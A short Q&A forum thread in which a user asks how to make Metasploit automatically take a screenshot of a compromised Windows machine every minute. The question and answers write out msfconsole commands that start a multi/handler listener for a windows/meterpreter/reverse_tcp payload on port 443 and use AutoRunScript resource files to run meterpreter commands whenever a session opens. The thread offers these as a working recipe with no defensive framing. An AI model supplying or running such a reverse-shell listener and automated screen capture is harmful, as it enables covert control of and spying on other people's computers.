# auto run metasploit then meterpreter commands

Tags: python, bash, payload, metasploit

I want to run metrpreter commands every minute automatically, unfortunately I don't have enough skill in programming to make a bash script or python. 
for example I want to do these automatically:

```
msfconsole   
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit 
Meterpreter session 1 opened
meterpreter > screenshot
```

in fact takes screenshot every minute automatically

Answer (score 1):

Do something like

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
set AutoRunScript multi_console_command -rc commands.rc
exploit -j -z
```

While in commands.rc put your meterpreter commands one per line

Comment: +1 @Rashwanov.This runs meterpreter commands once but I want to do (repeat) specified comands such as 'screenshot' every one per minute automatically.

Answer (score 0):

we can make listener.rc

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit -j -z
```

and run:

> msfconsole -r ~/listener.rc

but how can add meterpreter commands ?

Answer (score 0):

This method worked for me:

```
set AutoRunScript /root/commands.rc
```

(Make sure that the meterpreter commands listed one by one in commands.rc)